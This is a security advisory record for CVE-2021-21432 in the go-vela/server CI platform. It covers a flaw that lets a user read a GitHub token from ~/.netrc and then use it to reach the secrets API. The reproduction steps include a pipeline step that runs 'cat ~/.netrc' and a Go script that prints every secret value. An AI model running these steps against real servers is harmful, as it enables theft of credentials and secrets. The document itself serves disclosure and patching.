---
id: CVE-2021-21432
aliases:
  - GHSA-8j3f-mhq8-gmh4
  - GO-2022-0812
title: Reject unauthorized access with GitHub PATs
summary: Reject unauthorized access with GitHub PATs
severity: high
cvss: 7.5
cvssVector: 'CVSS:3.1/AV:A/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:L'
vendor: go-vela
product: github.com/go-vela/server
ecosystem: go
affected:
  - 'github.com/go-vela/server >= 0.7.0, < 0.7.5'
patched:
  - github.com/go-vela/server 0.7.5
published: '2022-02-15'
updated: '2026-07-08'
source: OSV
sourceUrl: 'https://osv.dev/vulnerability/GHSA-8j3f-mhq8-gmh4'
references:
  - url: 'https://github.com/go-vela/server/security/advisories/GHSA-8j3f-mhq8-gmh4'
  - url: 'https://nvd.nist.gov/vuln/detail/CVE-2021-21432'
  - url: 'https://github.com/go-vela/server/pull/337'
  - url: >-
      https://github.com/go-vela/server/commit/cb4352918b8ecace9fe969b90404d337b0744d46
  - url: 'https://github.com/go-vela/server'
  - url: 'https://github.com/go-vela/server/releases/tag/v0.7.5'
  - url: 'https://pkg.go.dev/github.com/go-vela/server'
tags:
  - osv
  - go
epss: 0.00986
epssPercentile: 0.608
ingestedAt: '2026-07-09T18:56:36.227Z'
---

## Overview

### Impact
_What kind of vulnerability is it? Who is impacted?_

The additional auth mechanism added within https://github.com/go-vela/server/pull/246 enables some malicious user to obtain secrets utilizing the injected credentials within the `~/.netrc` file. Steps to reproduce

1. Create Vela server
2. Login to Vela UI
3. Promote yourself to Vela administrator 
    - `UPDATE users SET admin = 't' WHERE name = <username>`
4. Activate repository within Vela
5. Add `.vela.yml` to the repository with the following content

    
    ```yaml
    version: "1"
    
    steps:
    - name: steal
      image: alpine
      commands:
        - cat ~/.netrc
    ```

1. Look at build logs to find the following content

    ```
    $ cat ~/.netrc
    machine <GITHUB URL>
    login x-oauth-basic
    password <token>
    ```

1. Copy the password to be utilized in some later step
1. Add secret(s) to activated repo
1. Copy the following script into `main.go`

    ```golang
    package main
    
    import (
	    "fmt"
	    "github.com/go-vela/sdk-go/vela"
	    "os"
    )
    
    func main() {
	    // create client to connect to vela
	    client, err := vela.NewClient(os.Getenv("VELA_SERVER_ADDR"), "vela", nil)
	    if err != nil {
		    panic(err)
	    }
    
	    // add PAT to request
	    client.Authentication.SetPersonalAccessTokenAuth(os.Getenv("VELA_TOKEN"))
    
    
	    secrets, _, err := client.Admin.Secret.GetAll(&vela.ListOptions{})
	    if err != nil {
		    panic(err)
	    }
    
	    for _, secret := range *secrets {
		    fmt.Println(*secret.Name)
		    fmt.Println(*secret.Value)
	    }
    }
    ```

1. Run the `main.go` with environment specific settings
   - `VELA_SERVER_ADDR=http://localhost:8080 VELA_TOKEN=<token obtained previously> go run main.go`

The previously posted script could be updated to utilize any API endpoint(s) the activated user has access against.

### Patches
_Has the problem been patched? What versions should users upgrade to?_

* Upgrade to `v0.7.5` or later

### Workarounds
_Is there a way for users to fix or remediate the vulnerability without upgrading?_

* No known workarounds

### References
_Are there any links users can visit to find out more?_

* https://github.com/go-vela/server/pull/246
* https://docs.github.com/en/enterprise-server@3.0/rest/reference/apps#check-a-token

### For more information
If you have any questions or comments about this advisory

* Email us at [vela@target.com](mailto:vela@target.com)

## Affected packages

- `github.com/go-vela/server >= 0.7.0, < 0.7.5`

## Remediation

Upgrade to a patched release:

- `github.com/go-vela/server 0.7.5`
